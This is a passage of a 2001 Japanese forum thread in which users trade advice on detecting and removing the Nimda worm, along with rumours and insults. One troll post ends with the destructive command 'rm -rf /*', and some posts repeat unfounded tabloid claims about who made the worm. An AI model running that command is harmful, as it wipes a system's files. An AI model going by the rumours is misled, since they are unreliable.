_ :01/09/19 12:11 ID:jzKbqutU
IE6って見た目はWINDOWS−XPちっくなの?
402 :
:01/09/19 12:11 ID:s3PsnOCQ
まだ、けっこう知らない人が多いみたいだから、あちこちの大きな サイトのBBSで、みんなにも教えてあげようよ
403 :
399 :01/09/19 12:11 ID:n5wmWdo2
教えて君になってしまった・・・ 検索してきます<ネスケ
404 :
_ :01/09/19 12:11 ID:o12ilfao
>>369 のページどうでもいいけど、スクリプトそのまま書くなっつーの。
"改竄されたページには、下記のスクリプトが埋め込まれている。
「 」"
表示されてないやん。
405 :
ガシシ右松 :01/09/19 12:12 ID:leFSdsqc
>>290 「ふりっぽ」やられてるんだ!!
「ダウンロードしますか?」ダイアログを
キャンセルしてもreadme.exeとreadme.emlはできてるよ。
とりあえず「スタート」→「ファイルやフォルダの検索」で、
readme.exeと*.eml 探して、
見つけ次第削除。
あとさっき教えてもらったんだけど、
「temporary internet files」に残ってるやつも抹殺。
406 :
:01/09/19 12:13 ID:XDNpbKcY
>>390 CodeRedみたいなもんです。
バグを突いて感染。
407 :
:01/09/19 12:13 ID:VXccxyFg
トレンドマイクロのオンラインスキャンのページ、やたら重い・・・
408 :
:01/09/19 12:13 ID:70l4IFsk
409 :
:01/09/19 12:14 ID:1L5pANOU
状況報告ver1.01(前編) 対策 1.IE5.01とIE5.5はSP2以外無条件でDL実行してしまうので、感染前ならアップデートする 2.それでもダイアログは開くので、覚えのないファイルはDLしない。 3.ツール→インターネットオプション→セキュリティ→レベルのカスタマイズ →java関連とダウンロードのファイルのダウンロードを不許可。 現在わかっている影響 1.メールによるウイルスファイルの頒布 2.WEBコンテンツ閲覧時にそのサーバにウイルスパケットを送り攻撃、感染する。 3.バックドアを開き、クライアントを丸裸にする。 4.大量の*.emlファイルを量産する。 5.感染したPCはCドライブをネットワーク共有する。 もしかしたら他のファイルに潜伏するかもしれない。 メールによる接触時 ウィルス感染したメールを受信したとき、readme.exe はwav(音声)ファイルになりすます。
410 :
:01/09/19 12:15 ID:1L5pANOU
状況報告ver1.01(後編) 感染の有無の確認 1.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT *.emlが大量にHITした際は確定。 ただし、それが以前に自分の書いた見覚えのあるメールだったら、 それはウイルスではない。 そうでないときは後者2個を削除して様子を見る。 2.『mep』で検索した際に『mep????.tmp』がHITする。 感染時の対応 感染してしまった後は、アップデートしても無意味。 とりあえず検索で引っかかったファイルを削除した後、感染を拡大しないように ウイルス対応ソフトのHP以外には行かず、ワクチンが出来るまで他のWEBコンテン ツを回らない。 ワクチンできたよとかの情報など、追加のフォローさらに宜しく!>ALL
411 :
名無しさん :01/09/19 12:17 ID:t5ePDc5w
IE6にしたら、リロードの度にいちいちお気に入り欄も反応するけど。 俺だけ?
412 :
:01/09/19 12:17 ID:.l/vJ77g
今回の件てMSNがハッキングされたってことなの?
413 :
:01/09/19 12:18 ID:AhB/VHTI
今、このこと全く知らずに MSN見てるヤツがいるんだけど、 見てても大丈夫なの? すげー、嫌いなヤツだから、 話しかけずに、ほっといてるけど。
414 :
:01/09/19 12:17 ID:/PP57wRc
今日、ここ見てなかったら確実に感染シテタヨ。 みんな、アリガト。
415 :
:01/09/19 12:18 ID:h8x6dquQ
ADMIN.dllってファイルを各ドライブに作られましたが、私だけ?
416 :
:01/09/19 12:17 ID:wpo3neEk
今日、ここ見てなかったら確実に感染シテタヨ。 みんな、アリガト。
417 :
:01/09/19 12:18 ID:qasMGDqo
>>399 あ、あのう、、、、WIN版もありますよ、、
418 :
:01/09/19 12:18 ID:BBJlMU0k
今さっきウィルスの事知ったんですが、スタート→検索で*.emlを検索して 引っかからなければセーフって事ですか?
419 :
:01/09/19 12:18 ID:PUJYPwZU
IE5.5sp2って、なんだかテンポが違うな。 早いのか遅いのかわからんw
420 :
:01/09/19 12:18 ID:p5f2KD92
>>412 MSNも例外ではなかった、ってところかと。
特定のどこかがターゲットと言うわけではないでしょう。
まさに同時多発テロ。
421 :
:01/09/19 12:18 ID:vt1a9us6
SP2を入れようよしたら7204Kまでいって必ず失敗するんですけど・・・なんで?
422 :
オレも :01/09/19 12:19 ID:iOVUc1CA
今日、ここ見てなかったら確実に感染シテタヨ。 みんな、アリガト。
423 :
:01/09/19 12:19 ID:PW.2PJSk
ウイルススキャン、一時間もかかった・・・
424 :
:01/09/19 12:20 ID:p0HcAdmo
オンラインスキャンしてたらPC落ちた(ウトゥ
425 :
:01/09/19 12:20 ID:p5f2KD92
426 :
:01/09/19 12:20 ID:AhB/VHTI
427 :
◆ICHIROZ6 :01/09/19 12:21 ID:qGtwdjDE
IE6に変えたら動きが重くなった気がする
428 :
:01/09/19 12:21 ID:spzt.8VY
昨日、ここ見てたら確実に感染タヨ。 みんな、直リンアリガト。 殺すぞ
429 :
:01/09/19 12:21 ID:iOVUc1CA
そっかメールアドレス知ってる人にはこの事教えてあげたほうがいいんだな
430 :
◆ICHIROZ6 :01/09/19 12:22 ID:qGtwdjDE
431 :
390 :01/09/19 12:22 ID:McRIbKxw
まえスレ読もうとしたら玉三郎でバビッタよ。 今からじっくり読んでまた来る。
432 :
:01/09/19 12:22 ID:KAXVrO3Y
我が社では、普段は玩具扱いのiMacが、一番輝いております!!
433 :
:01/09/19 12:22 ID:p5f2KD92
>>429 自分に感染してないことよーく確認してからね。
434 :
:01/09/19 12:22 ID:BceX/Byw
435 :
:01/09/19 12:23 ID:zsQE2Q3w
436 :
教えて下さい :01/09/19 12:24 ID:rlSzlXt6
自分はマックなので心配ないそうですが、友人のほとんどはWINなので、至急 この事を教えてあげたいのですが、ここのアドレスを友人達に送ったらいい のですか?あと309をコピーしてやるとか。全然WINのことわからないので。
437 :
:01/09/19 12:23 ID:CoeuKRio
438 :
:01/09/19 12:24 ID:XDNpbKcY
なんてかMS信者なら WindowsUpdateを一日一回は拝んでほしい と思うのは私だけ? さっきから100回以上変なアクセスがw
439 :
113 :01/09/19 12:24 ID:LNEMDmj.
私も昨日今日、ここ見てなかったら確実に感染シテタヨ。 みんな、アリガト。 コピですまん。
440 :
:01/09/19 12:24 ID:p5f2KD92
>>435 強いて言うならばターゲットはMSに阿る者全てかもだ。
441 :
:01/09/19 12:25 ID:LvtXHlho
mep・・・354個・・・
442 :
名無しさん :01/09/19 12:25 ID:t5ePDc5w
>>430 俺のは重くはないんだけど(ケーブルテレビ)、
やっぱ、俺だけではないんだね。なんかウザイです・・
443 :
:01/09/19 12:24 ID:6bKYUMSc
444 :
のこ :01/09/19 12:27 ID:yjsoab4s
(断片的な情報を集めたのでまちがってたらごめんなさい。) その1 ●Nimdaについて(coderedとはちがうよーん。) タイプ Worm 目標 IIS サーバーと Microsoft Outlook. ●感染 IIS web サーバー(自己増殖する) IIS自身がかってにwormを送出しますので、 特に感染している方に隣接しているネットワークの方は感染の疑いあり。 NTと2000は要注意。 ☆やばいサイト やばいサイトをひらくこうとすると.eml (outlook expressのemailファイル)ファイルをダウンロード するかどうかきいてくる。これにワームがくっついてくる。 そのやばやばのREADME.EXEは添付されてても見えませんので。 それからこのファイルサイズは57344です。 ☆98、95の方はひとまず安心という話 でも最新のパッチはあてときませう。 ●症状 ☆MAPIをつかって、README.EXE(ちなみにこれはみえない。)を送出する。 ☆ファイルの書き換え。 (addmin.dll、riched20.dll. Riched20.dll,load.exe, .HTM , .HTML ,レジストリ等) ☆システムのスローダウン ☆cドライブを共有フォルダとしてかってにオープンする。 つづく。
445 :
:01/09/19 12:27 ID:Jv..cQeQ
というかシェアからいったら、 「MS信者逝ってよし!」というより 「君もMac信者にならないか?」じゃないの。
446 :
:01/09/19 12:27 ID:6bKYUMSc
447 :
のこ :01/09/19 12:28 ID:yjsoab4s
448 :
:01/09/19 12:28 ID:AhB/VHTI
SP2に更新したら、 書き込んだあと、板にもどれなくなったんだけど。
449 :
:01/09/19 12:29 ID:X6YlkZ9U
>>379 うちの会社は、かなりの数のPCに、emlファイルがばら撒かれました。
サーバーが大変な事になってるみたい。
450 :
399 :01/09/19 12:30 ID:n5wmWdo2
>>417 グーグルで在りかを突き止めました!
ネスケのDL完了まであと55分・・・SP2のあと6時間よりはマシかな(;´Д`)
451 :
418 :01/09/19 12:30 ID:BBJlMU0k
どなたかマジレス下さい… 心配で心臓痛くなってきた…
452 :
:01/09/19 12:30 ID:.xGaQ9lU
MXやってて問題ない?
453 :
:01/09/19 12:31 ID:AhB/VHTI
鯖重い。
454 :
名無しさん :01/09/19 12:31 ID:t5ePDc5w
>>448 俺はここ読んでsp2にして、どうせだから6にしたけど、
5.5sp2は異常なかったような感じだった。ちゃんと読めたし書けたよ。
455 :
:01/09/19 12:32 ID:QzWYZO/c
以前、Macに乗り換えるはずだったんだけど、 G4・CUBEのおかげで今でもWindowsだよ(w
456 :
:01/09/19 12:32 ID:.xGaQ9lU
>>451 .emlだけではなんともいえないでしょ
アウトルックつかってるなら
457 :
ド素人 :01/09/19 12:32 ID:AGkf8kDY
ここの掲示板読んで上のお知らせ板からアップデートしたけど、 10秒くらいでアップデートしたけどこれでいいの? アップデートしたことないから、、、。 MSNが感染したってどういうことなの?セキュリティしっかりしてそうなのに。
458 :
:01/09/19 12:32 ID:Y5AkCUiQ
459 :
:01/09/19 12:32 ID:XL1ZIYFM
460 :
:01/09/19 12:33 ID:1L5pANOU
>>418 潜伏期間もあるので『readme.exe』『MEP51B3.TMP.EXE』の検索も
実行して。
あったら削除。
削除したらあとは運を天に任せて『*.eml』が量産されないことを祈るのみ。
461 :
:01/09/19 12:33 ID:XDNpbKcY
>>451 心配ならオンラインスキャンするなり
system.iniを見るなりすればいいのでは?
462 :
:01/09/19 12:33 ID:FMe3OP8w
こんな緊急事態にNetBusでウチのPCに何度もアクセスしてくるアホゥがいる・・・・
463 :
:01/09/19 12:33 ID:OxTnBwRI
ううむ、帰ったら家のPC全部チェックせねば。 ネスケ愛用の親は大丈夫だろうが、 ムーソ使用の漏れのPCの方を重点的にチェックしよう。 昨日の夜はろくに回ってないから大丈夫だとは思うが(;´д`)
464 :
あ :01/09/19 12:34 ID:rMHoLCL6
IE6なら大丈夫なのか。。。 先日アップしたばっかりだからでよかった。
465 :
:01/09/19 12:34 ID:pVWEyKzA
ちッホワイトハウスは感染してねーかw
466 :
:01/09/19 12:34 ID:.xGaQ9lU
>>457 ほんとにした?
デスクトップのセットアップ実行した?
467 :
436 :01/09/19 12:34 ID:NCoXZZh6
446さん、すいません。ありがとうございました。早速みんなに メールします
468 :
:01/09/19 12:34 ID:QNTUCHqw
IE5.00もダメか?
# 昼飯から復帰。
>>391 はいはい、ご苦労さん。
> SPとか、俺にはさっぱりわからん
サービスパック(SP)の意味がわからない時点で初心者だと思うぞ。
どんなOSを使っているか知らないけど、せっかくなのでIEでない
ブラウザを使っているとしてもウイルスチェックをしておいたほうが良いよ。
470 :
:01/09/19 12:34 ID:pytz7IQ.
5.5のSP2って直にダウンできないの? Windows updateは嫌い。 ってゆ〜か学校でSP2落とせば家で電話代かからないし。
471 :
:01/09/19 12:36 ID:qpXKNfss
IE5.0です。 昨日の晩、クラックされたどっかの大学のHPをエロサイト対策と 同じ装備で見に行ったんだけど、大丈夫だったよ。 半角板に感謝(藁
472 :
:01/09/19 12:36 ID:iOVUc1CA
やっとIE5.5SP2に出来た、ふー 後は何したらいいですか? 試しに感染サイトにいってみようかな?
473 :
:01/09/19 12:35 ID:pytz7IQ.
5.5のSP2って直にダウンできないの? Windows updateは嫌い。 ってゆ〜か学校でSP2落とせば家で電話代かからないし。
474 :
:01/09/19 12:36 ID:OxTnBwRI
こうして善意のチェーンメールが広まって更にネットが重くなるのか。 鬱だ。
475 :
ド素人 :01/09/19 12:37 ID:AGkf8kDY
>>466 こんなこと言うと煽られそうだけど、、、
デスクトップのセットアップって何?
476 :
:01/09/19 12:37 ID:I2xFE9vM
ダウソしたIEが別の新種ウィルスに感染してねぇだろうな?
477 :
:01/09/19 12:38 ID:0Ow18JK2
今回のウィルスは、下手するとメリッサやアイラブユーを超える感染力で、 世界的なネットワークのインフラそのものに甚大な影響を与えかねない。 にも関わらず、朝日も毎日も下らない「陰謀説」を記事にしてるだけで、 具体的な対応策を書かないのは何たることだ。
478 :
:01/09/19 12:38 ID:CIjuhvgQ
(´ー`)。oO(どうやって持って帰るんだろう)
480 :
:01/09/19 12:38 ID:qqVxz.uA
ねぇねぇ
>>370 の追加情報はないの!?
せっかく眠いのに朝一で研究室いって対策してきたのに.
これがほんとだったらもうどうにもならんYO!?
わかった,デマなんだな!?そうなんだな!?
もう寝ちゃうYO!?
481 :
ナナシサン :01/09/19 12:38 ID:ETHVTTR2
>475 ねたすか?
482 :
:01/09/19 12:39 ID:byucTCuc
483 :
418 :01/09/19 12:39 ID:BBJlMU0k
>>456 アウトルックは検索に引っかからないんですか…
>>451 一応ざっと見てみたんですが、居てもたってもいられなくて。ごめんなさい。
>>460 ありがとうございます。早速検索してみたんですが、両方とも引っかかりませんでした。
マジレスありがとうございました。
485 :
:01/09/19 12:40 ID:pVWEyKzA
>>478 TOPページのソースの一番下に三つあったのは確認したw
486 :
鉄壁最悪 :01/09/19 12:41 ID:H46UXkRs
おいら鉄壁というのを使っているんだが、スキャン途中で落っこちる。 買ったときから色々不満はあったが使えないにも程がある。 ノートンかバスターにしとくんだった。 とりあえずトレンドマイクロのオンラインチェックで感染なしを確認。 サンクス!トレンドマイクロ、 ソースネクストのばかろう。
487 :
:01/09/19 12:42 ID:qasMGDqo
あのー、アタックかけられてるって、どうしてわかるんですか? それは、WEBサーバーのこと? PCのこと?
488 :
:01/09/19 12:42 ID:pVWEyKzA
>>486 いまスキャン中なんだけど、なんかノートン先生フリーズしてる(藁
>>475 IEのダウンロードサイトからダウンロードすると、ie5setup.exeとかie6setup.exe
ってのが落ちてくるはずなので、それを実行したかどうかってこと。
実行しないとIEの最新版をインストールしたことにはならないぞ。
490 :
勘違い素人 :01/09/19 12:42 ID:6bKYUMSc
JavaScriptを切って、HTMLメールを受信しなければ、大丈夫?
491 :
:01/09/19 12:44 ID:Od1RIdHU
モナ板の過去ログ倉庫がみれない・・・(鬱
492 :
:01/09/19 12:45 ID:J6gqWM9Q
>>469 かかったかかった。
パッチと言えボケ。バグ修正版なんだからなにがサービスだ。カス。
>どんなOSを使っているか知らないけど、せっかくなのでIEでない
俺はPlamo & Netscape or lynxですが何か?
しかしWin厨にウイルスチェックを薦められるとは。
493 :
落ち着いて感染チェックしろ! :01/09/19 12:45 ID:byucTCuc
494 :
ド素人 :01/09/19 12:45 ID:AGkf8kDY
>>489 多分落ちてきてないと思う。
教えてくれてありがとう。。。
もう一度逝ってきます。
495 :
:01/09/19 12:46 ID:1L5pANOU
>>490 大体OKだけど、ファイルのDL拒否してもファイルができていたという
報告があるので、念のためにセキュリティの『ファイルのダウンロード』
の項目も不許可にした方が吉。
>>486 ソースネクストもそうだけど、McAfee(実際のメーカー)もそうだな。
>>487 ファイアーウォールのようなソフトウエアを入れていれば、不正なアタックが検出できる。
497 :
:01/09/19 12:47 ID:Od1RIdHU
スレ一覧やった・・・ 逝ってきます。。。
498 :
名無しさん :01/09/19 12:47 ID:uSVTlsN.
トレンドマイクロ落ちてます。
499 :
(´ー`)y-~~ :01/09/19 12:48 ID:5Gm8qeQs
500 :
:01/09/19 12:48 ID:J6gqWM9Q
>>496 >ファイアーウォールのようなソフトウエア
ぷっ
ファイアーウオールはソフトウエアじゃねーぞ。ばーーーか。
さすがWin厨。
用語がなってないよ。
501 :
:01/09/19 12:48 ID:CIjuhvgQ
Service Pack 2 (・・?)
502 :
:01/09/19 12:48 ID:qasMGDqo
>>496 なるほど、やっと理解しました<アタック
どうもありがとう。
>>492 ほほー、Linuxなんだ。俺はSuSEスレでさんざん書いてた奴だ。
今は倉庫落ちしたかな?
Linux板では "潜伏中" のハンドルで書いてるよん :-)
> パッチと言えボケ
Microsoftが「サービスパック」だと言ってるのでソレをそのまま利用しただけ。
504 :
:01/09/19 12:50 ID:yMcYQ9GQ
505 :
:01/09/19 12:50 ID:djrfc4Gs
506 :
:01/09/19 12:50 ID:1L5pANOU
507 :
:01/09/19 12:50 ID:qasMGDqo
>>500 え、WEBのファイアウォールのことじゃなくて、そういう別な
ソフトがあるんだと思ったんですけど、違います?
私は初心者なので、わからないけれど、なんで、あなたは
個人攻撃をここで続けてるんでしょう。うざいです。
508 :
名無しさん :01/09/19 12:51 ID:70l4IFsk
509 :
お? :01/09/19 12:51 ID:YLu79Ox2
spってパッチの詰め合わせ=サービスパックでいいんじゃ?ちがうの? いっこいっこはパッチで。
510 :
:01/09/19 12:51 ID:uiw7kC0I
readme.exe、MEP51B3.TMP.EXEはヒットしなかったけど *.emlとmepは大量発見。アウト?
511 :
:01/09/19 12:51 ID:J6gqWM9Q
>>503 なんだ、おまえWin -> Linux 組か。だせっ。
単なるWin厨かと思ったのに
煽りがつまらなくなった。
bye
512 :
:01/09/19 12:52 ID:aDolkrTk
一人粘着房がいる模様
513 :
:01/09/19 12:53 ID:djrfc4Gs
514 :
:01/09/19 12:53 ID:/Sg0yRdA
>>500 ごめんなさい。ぞねや黒氷をファイアーウォールだと思っていました。
515 :
:01/09/19 12:53 ID:Y5AkCUiQ
>>992 犬厨はすっこんでろ
あんたみたいなののせいでUNIX使い全体のイメージが悪くなる
健気に自分のマシンを気にする一般ユーザを煽って何が得られるんだ?
仕事で上司に叱られて怒りにまかせた煽りしてるんだらコーヒーでも飲め
516 :
:01/09/19 12:53 ID:J6gqWM9Q
>>507 全然違うんですけど。。。
にわか専門家素人はあんまりしゃしゃり出ないほうがいいよ。
517 :
:01/09/19 12:54 ID:OO3wQbOI
東スポに、アオリ記事がデカデカと…。
518 :
:01/09/19 12:54 ID:ZGnsXA6c
519 :
:01/09/19 12:54 ID:iD2MBbLE
OutlookExpressで質問です。 ウイルス添付がされているメールが来た場合 添付ファイルを実行させないようにするには どーすればいいんですか?
520 :
参考情報 :01/09/19 12:54 ID:byucTCuc
521 :
名無しさん :01/09/19 12:54 ID:t5ePDc5w
テレ朝で放送中!
>>500 > ファイアーウオールはソフトウエアじゃねーぞ
妙なところを指摘するなぁ :-)
ファイアーウォールは単にセキュリティ上都合の悪いモノをブロックするため
(それがネットワークレイヤのパケット偽装なのか、それともアプリケーションレイヤの変なhtml(javascript)かは知らないが)
の防御壁(防火壁)なんであって、ソフトウエアである場合もあるし、ハードウエアである場合もある。
523 :
:01/09/19 12:54 ID:pVWEyKzA
>>512 ありゃあ、今回の件で再インストール以外の処置が解らなかったWinユーザーだよ。
可哀想だから放置して置いてあげなさい。
524 :
:01/09/19 12:54 ID:0C89g52A
東スポは一面大見出し
525 :
:01/09/19 12:54 ID:J6gqWM9Q
>>515 どこのコピペだよ。?未来にレスしてるぞ。
526 :
名無しさん :01/09/19 12:54 ID:t5ePDc5w
ラディンが犯人ってか???
527 :
:01/09/19 12:55 ID:djrfc4Gs
>>495 ありがとう。
このウイルス感染を言い訳に、納期を遅らせていいですか?
529 :
:01/09/19 12:56 ID:rydEHM7E
>>J6gqWM9Q ちょっと痛々しい。
530 :
:01/09/19 12:56 ID:J6gqWM9Q
>>522 間違いは指摘するから。厨房への影響がよくない。
531 :
:01/09/19 12:56 ID:j4gg3ouk
IE6.0を導入したらデスクトップ「e」のアイコンの色が 薄くなってしまいましたが、問題ありますか?
532 :
ナナシサン :01/09/19 12:56 ID:ETHVTTR2
W32NIMDA→ADMIN23W→ADMIN to 3W だそうな
533 :
:01/09/19 12:56 ID:N4U8iOCw
ここまでスレが成長するとは・・・
今更ながら前スレの
>>1 はエライ
534 :
あは :01/09/19 12:56 ID:jzKbqutU
夕刊キャッチアップやってるアナが 今回のウイルスの記事で war をワーと読んでたよ。
535 :
豆 :01/09/19 12:56 ID:K7bK1LgQ
とりあえずお祈りします。
536 :
:01/09/19 12:57 ID:hsQGmGak
前スレのID:8oVJNRd2 = ID:JlX0ElGE だけど、、 やっとみんなことの重大さに気づいてくれたのだね。。(涙 前スレはみんなに気づいてもらえなかったからなぁ…。 マァヴさん、ありがと。
537 :
:01/09/19 12:57 ID:QzWYZO/c
ルーター厨はファイアーウォールソフトやIDSは必要ないと考えているふしがある(w
538 :
:01/09/19 12:57 ID:OO3wQbOI
W32NIMDAを、ADMIN to 3W と読めるという話なんだけど、 W32NIMDAのW32の部分は、ワクチン会社だよな…。
539 :
:01/09/19 12:57 ID:qasMGDqo
>>516 「にわか専門家素人」??ヘンな言葉ですねー。
だから、私は初心者だって言ってるでしょ。ぷんぷん。
質問して、丁寧に答えてくれてるnanasisan に感謝してます!
540 :
:01/09/19 12:57 ID:2sUuWuR6
いまIE5.0なんだけどIE6.0やIE5.5SP2にバージョンアップしたら 顔文字ってうまく表示できなくなるんですよね?
541 :
:01/09/19 12:57 ID:ULTmFmXo
ラディンの部下のパソヲタが勝手にワームを配布。 何も知らずにネットアクセスしたラディンのPCが世界中から丸見えに。 「My Picture」に炉画像が満杯というオチが好き
542 :
:01/09/19 12:58 ID:zsQE2Q3w
543 :
:01/09/19 12:58 ID:iOVUc1CA
>524 >東スポは一面大見出し ホントに?
544 :
:01/09/19 12:58 ID:J6gqWM9Q
545 :
:01/09/19 12:58 ID:YLu79Ox2
546 :
参考情報 :01/09/19 12:59 ID:byucTCuc
547 :
:01/09/19 12:59 ID:/Sg0yRdA
東スポは飛ばしてるなあ・・・
>>511 Win -> Linuxじゃなくて、
OSの無い時代 -> 一時的にMS-DOS -> 386BSD -> FreeBSD -> Linux0.1 -> Windowsにも進出
なんだけどね。まーいいや。
>>514 いちおうそれで認識は合っているよ。
549 :
:01/09/19 12:59 ID:pVWEyKzA
550 :
:01/09/19 13:00 ID:/5kmeCaQ
態度の大きさは、経験に反比例する。
551 :
:01/09/19 13:00 ID:jDmQpsF2
粘着なんて無視しようよ。
552 :
:01/09/19 13:00 ID:qasMGDqo
>>545 あ、ありがとう! 玉三郎のスレしか読めなかったんで(藁
やっと、前スレがわかった、、、
553 :
:01/09/19 13:01 ID:P2TGn6e6
554 :
:01/09/19 13:00 ID:J6gqWM9Q
555 :
:01/09/19 13:01 ID:RExNvnKU
今日初めて2チャン来たら なんじゃこりゃーーーー!!! 怖くてどこのサイトもみれねーよ 回線切ろう
556 :
ナナシサン :01/09/19 13:01 ID:ETHVTTR2
>548 スゲー
557 :
:01/09/19 13:02 ID:ehK3v1x6
558 :
:01/09/19 13:02 ID:Y5AkCUiQ
559 :
:01/09/19 13:02 ID:iOVUc1CA
もはや信じれるのは2chだけ
560 :
天王寺動物園 飼育部担当 :01/09/19 13:02 ID:aDolkrTk
◆このスレッドをご覧の皆様へお知らせとお願い◆ ---------------------------------------------- 先程から当スレッドでチンパンジーの>511 ID:J6gqWM9Q が暴れておりますが、観賞用ですので 決してレスしないでご鑑賞ください。 ---------------------------------------------- よろしくお願いします。
561 :
:01/09/19 13:02 ID:czWe7QYA
>>370 会社のPCがたくさんやられた。
みんながみんなMSNとかを回って感染したとは考えられん。
シマンテックの解説でも
「ワームはオープンなネットワーク共有を探し、自分自身をコピーします。」
と書いてあるけどLANで繋がってるだけでヤヴァイって事?
今のところは、ワークグループを超えてはこない感じなんだけど。
562 :
:01/09/19 13:02 ID:CIjuhvgQ
俺もだんだん、544が可哀想に思えてきた・・・・(w
563 :
:01/09/19 13:02 ID:/Sg0yRdA
ID:J6gqWM9Qに神様のご加護がありますように
564 :
:01/09/19 13:03 ID:A2Y42Qew
うわぁ。FBIも特別捜査班結成してるのかぁ…。 じゃ前スレでも上がってたこの部分に「あぁ?」って思ってるんだろうなぁ…。 SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0
565 :
:01/09/19 13:03 ID:N4U8iOCw
566 :
名無しさん :01/09/19 13:03 ID:70l4IFsk
>>557 jsオンにしないと表示できない。
マジでユーザをなめてる。
568 :
:01/09/19 13:03 ID:byucTCuc
569 :
:01/09/19 13:03 ID:.0wwXIHk
>>544 unixやlynxの知識が少し位あるからって偉くないんだよ
おこちゃまは、おとなしくしててね
570 :
jobless :01/09/19 13:03 ID:XLetl0lw
横着してIE5.00SP2のままだったから関係なかったYO−(^^)/
571 :
:01/09/19 13:04 ID:iOVUc1CA
>561 やっぱ会社は被害受けてるんだね 大変だ、ますます酷くなりそう・・
572 :
:01/09/19 13:04 ID:kfsTeeSI
hotmail使ってるんだけどMSNのtopページからじゃなくて hotmailのログインページに行くのもダメなの? 教えてチャンでごめん。
573 :
:01/09/19 13:04 ID:yAHnr2Qo
574 :
:01/09/19 13:04 ID:9aCAso0I
IE入れない企業が多いのも頷ける
575 :
:01/09/19 13:05 ID:wOuMO9ng
Vine使ってる初心者です。Konquerorでも伝染りますか?
576 :
:01/09/19 13:05 ID:J6gqWM9Q
あーーー面白い煽りだった。 昼終わったから仕事に戻ろうっと。 せいぜいくるしんでろよーーー>ALL Win&IE厨 rm -rf /*
577 :
:01/09/19 13:05 ID:c8mjbTxo
>>549 次スレのタイトルは「みんなJ6gqWM9Qと語ろう!」
がイイと思う
578 :
:01/09/19 13:05 ID:hsQGmGak
>>561 Cドライブが共有設定されるからそこから被害拡大と思われ。
579 :
ナナシサン :01/09/19 13:06 ID:ETHVTTR2
>576 サムイ・・・コゴエソウ
# 昼休みも終わりなんでこのレスで厨房の相手は終了。
>>554 俺はそれより10歳以上若いぞ。
コンピュータなるものを使い始めたのは3歳の頃なんで。
581 :
:01/09/19 13:06 ID:ZibWL6yc
「J6gqWM9Qはヴァカだけど」が始まるかと期待して見ていたのだが。
582 :
:01/09/19 13:06 ID:j4gg3ouk
>『Nimdaは電子メールソフトOutlookのセキュリティ設定が「中」の場合,自動的に実行されるので,かなり感染力が強いようだ。』 ↑を「高」に設定する手順を教えてください。
583 :
:01/09/19 13:07 ID:c8mjbTxo
>>576 あれ、もう帰るの?
また遊びに来てね〜
584 :
ド素人 :01/09/19 13:07 ID:AGkf8kDY
よくわからないけどアップデートできたみたい。汗 IE5.5servise pack2とインターネットツールっていうのをダウンロードしてきた。。。 今度は3分位かかったし。
586 :
名無しさん :01/09/19 13:07 ID:70l4IFsk
>>576 たのむからこのスレにいてくれ、おまえは2chの宝だ。
オイラのはIE6のPublicpreviewから
>>116 の言うとおりDLして
>>313 と同じ状況。>一見問題ないように見えるが、
「オフラインブラウズパック」がDL・インストールともに不能。>詩嚢
588 :
:01/09/19 13:08 ID:qasMGDqo
>>580 nanasisan、、、、すてき(マジ
どうもいろいろ教えてくれてありがとう。
589 :
:01/09/19 13:08 ID:hsQGmGak
>>584 会社から2KとかNTだったりしないよね?
レス早くなってますね。 やっと追いつけた。 でも、ウィルスも活動が早いみたい。
591 :
:01/09/19 13:08 ID:Ii9GTKj6
J6gqWM9Qは・・・何か哀しいことでもあったのか? そんなに自慢げにrmコマンド使われてもなぁ・・・
592 :
:01/09/19 13:09 ID:byucTCuc
593 :
:01/09/19 13:09 ID:CIjuhvgQ
>>576 そんな事言っても、戻ってくるんでしょう。(w
594 :
:01/09/19 13:09 ID:ubxxTxCM
readme.exeってどこのへん探せばいい?
595 :
ななっすぃ :01/09/19 13:09 ID:ziy7mq.w
バージョンアップしたら Д が太く表示されるんだけど、どーして?
596 :
:01/09/19 13:09 ID:zsQE2Q3w
コピペ 78 名前:量産型ラディン 投稿日:01/09/19 13:08 ID:39GVbFRk 東スポ曰く、 このウイルスはラディンが仕掛けた物でコンピュータを狂わせて核ミサイルを発射させる事も可能。 このウイルスは第3次世界大戦の幕開けだ。 ラディン達は世界中のコンピュータを自由に操る事が出来ると言うのか。 …らしいです。 ま、いっかぁ東スポだし。 ふーん
597 :
^^; :01/09/19 13:09 ID:E34zYnC2
598 :
:01/09/19 13:10 ID:dvZoh28Q
98、95の人はセーフなんですか?
599 :
31アイスクリーム :01/09/19 13:10 ID:prNHR8MU
防御対策済みの人はもし感染されたHP見つけたら、メールで知らせて やってほしいm(__)m。漏れも1件知らせてWEB止めさせた。 1人1殺Nimda虫!
600 :
:01/09/19 13:10 ID:WTghJb5I
他の板では全然話題になってないけどどうなのよ?
601 :
:01/09/19 13:10 ID:ZGnsXA6c
602 :
:01/09/19 13:10 ID:AXdw0Hxk
>>587 亀レス。現在Cドライブ検索中、も該当ファイルなし!
>>598 OSとは関係なく、IEのバージョンで調べると良い。
605 :
:01/09/19 13:11 ID:Y5AkCUiQ
>>575 爆笑王を思い出させるような負け惜しみぶりだな
% kill -9 `ps -ef | grep J6gqWM9Q | awk '{print $2}'`
といったところか
ブラウザ立ち上げ直してID変えたら固定ハンドルでみんなを楽しませてくれよな
606 :
:01/09/19 13:12 ID:hsQGmGak
8/15から中国にふぁっくされてる前スレ500はネットワーク遮断したのかな?
607 :
:01/09/19 13:12 ID:Ii9GTKj6
608 :
名無しさん :01/09/19 13:12 ID:pxo5up2Q
あぶねーあぶねー、2ちゃん見てなかったら爆死していたところだった。 ソフトによるウイルスチェックはしていないけど、emlなどのファイルを 検索しても見つからなかったので感染していないのかな?
609 :
初心者さん :01/09/19 13:12 ID:bq3Ce/eg
Internet Explorer6にすると何かいいことあるの?
610 :
:01/09/19 13:12 ID:0C89g52A
俺は元々IE6なんだけど、さっき試しにノートンかけてみたらW32.Nimda.A@mm検出したよ IEのテンポラリーファイルにreedme[1].emlってのがあった どういうことよ?
611 :
:01/09/19 13:12 ID:kNF/Pobc
>>572 MSNのページは既に対策済み、むしろ他のサイトに要注意
ページロード完了と同時にreadme.exeがダウンロード指定
されたらヤバイぞ。
>>599 この前みたいな「ブラクラ」とか「迷惑メール」サイトに片っ端から
埋め込んであるのならわかるが・・・
>こういうのもブラクラチェッカでわかると最高だと思います。
613 :
ド素人 :01/09/19 13:12 ID:AGkf8kDY
